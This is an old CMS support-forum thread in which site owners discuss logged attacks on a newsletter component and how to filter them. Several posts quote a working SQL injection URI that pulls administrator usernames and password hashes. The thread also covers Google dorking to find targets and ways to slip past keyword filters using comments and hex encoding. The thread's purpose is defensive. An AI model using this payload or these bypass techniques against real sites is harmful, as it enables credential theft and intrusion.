Elxis CMS Forum

Support => Security => Topic started by: datahell on December 29, 2008, 20:59:36

Title: Attacks to Newsletter
Post by: datahell on December 29, 2008, 20:59:36

Elxis Defender blocked a couple of attacks to IOS Newsletter component. I immediately searched the component for security holes but I discovered that the attack was for a joomla's component with the same name! The 2 components have nothing common, so there is nothing to worry about. I just inform people using IOS Newsletter component that if you get a similar attack, dont worry the attack is addressed to joomla's web sites. Elxis' IOS Newsletter is absolutely secure. Joomla's Newsletter component is vulnerable to SQL injection attacks.

Here is the requested URI as caught by Elxis Defender:

index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*

The above URL can not harm Elxis or IOS Newletter.

Title: Re: Attacks to Newsletter
Post by: rentasite on December 30, 2008, 01:02:46

Quote from: datahell on December 29, 2008, 20:59:36

but I discovered that the attack was for a joomla's component with the same name!

a newsletter component for Joomla, with the same name !!?!!?!!  :o


Edit: Got an attack logged also, on one of my client's site.

Requested URI: /com_newsletter/index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*

Title: Re: Attacks to Newsletter
Post by: datahell on December 30, 2008, 08:32:14

The "listid" parameter in the URL does not exist in IOS Newsletter.
How hackers attack:
When a vulnerability is discovered hackers seach Google for sites having in URL a characteristic word inorder to find vulnerable sites. In this case they could search for inurl:com_newsletter or using the "allinurl"
They create a list of sites that match google's search results and begin to attack using a pre-made script.

So, to gether with the joomla's sites they also find Elxis sites from Google having "com_newsletter" in the url. But IOS Newsletter is absolutely secure. Do not worry.

I must say once more:
1. Always update your sites to the latest Elxis version.
2. Enable Elxis Defender and set some good filters.
3. Enable SEO PRO.

Title: Re: Attacks to Newsletter
Post by: Farhad Sakhaei on December 30, 2008, 11:54:27

Quote from: datahell on December 30, 2008, 08:32:14

How attackers attacks:
When a vulnerability is discovered hackers seach Google of sites having in URL a characteristic word inorder to find vulnerable sites. In this case they could search for inurl:com_newsletter or using the "allinurl"

This is Dork ... Like Google Dork (inurl: ...)

Quote from: datahell on December 30, 2008, 08:32:14

I must say once more:
1. Always update your sites to the latest Elxis version.
2. Enable Elxis Defender and set some good filters.
3. Enable SEO PRO.

And also consider to your server security and choosing a good secured server  :)

Title: Re: Attacks to Newsletter
Post by: ks-net on December 30, 2008, 21:06:53

Quote

I must say once more:
1. Always update your sites to the latest Elxis version.
2. Enable Elxis Defender and set some good filters.
3. Enable SEO PRO.

it is time to ask... i wanted to ask this question from months but always forgetting to do..
now it is time...

1-what other possible filters (except the example-filters in defender page) can we add and for what purpose in each case?
 
2-example-filters in defender page with red color supposed to be the most necessary.... if i guess right! are they?
  are they any other filters not listed there... i mean filters that block  well-known ways(in url) of attack? ....it is sure that    they are a lot of ways that someone can use to attack... is there a resource to give us more info? 

Title: Re: Attacks to Newsletter
Post by: datahell on December 31, 2008, 08:53:12

There are 2 kind of attacks: attempts to modify configuration options (XSS) and sql injections.
Most of the first ones are intercepted easily with a simple "mosconfig" filter. You should also make sure that allow_url_fopen is disabled in your php. The only problem with this filter is that you have to temporary disable defender if you wish to modify elxis configuration elsewhere you will be banned from your site!
SQL injection attacks are harder to defence against as hackers can use many variations of sql commands and is harder to block all of them. For instance if we have set filter "union select" a hacker may use "union/**/ select" to bypass our filter. Also many attacks use hex to bypass blocking mechanisms. So, it is absolutely needed the software we use to be as secure as possible in order even if an attack manage to pass to the inner script to not be able to harm it.

To find good filters study the way hackers attacks. If you search the internet you will find lot of exploits. Use key words from these exploits as Defender filters. The sample filters Defender has are all used in real attacks and thay are good but you can also use other.

Title: Re: Attacks to Newsletter
Post by: rentasite on February 11, 2009, 22:35:59

Elxis Defender blocked an attack to your site
ATTACKER IP ADDRESS: 58.241.255.38 (blocked)

Requested URI: /com_downloads/index.php?option=com_newsletter&Itemid=-1&listid=-1 union select 1,concat(0x40,username,0x40,password,0x40) from #__users where gid=25/*

DATE: 11-02-2009 22:04:47
Attack was logged

Title: Re: Attacks to Newsletter
Post by: datahell on February 11, 2009, 22:43:16

Don't worry. We have refer to this before. The attack is addressed to a mambo's component with the same name (but with nothing more in common). You can see this from the URL, it says "listid" which does not exist in IOS Newsletter. IOS Newsletter is absolutely secure  :)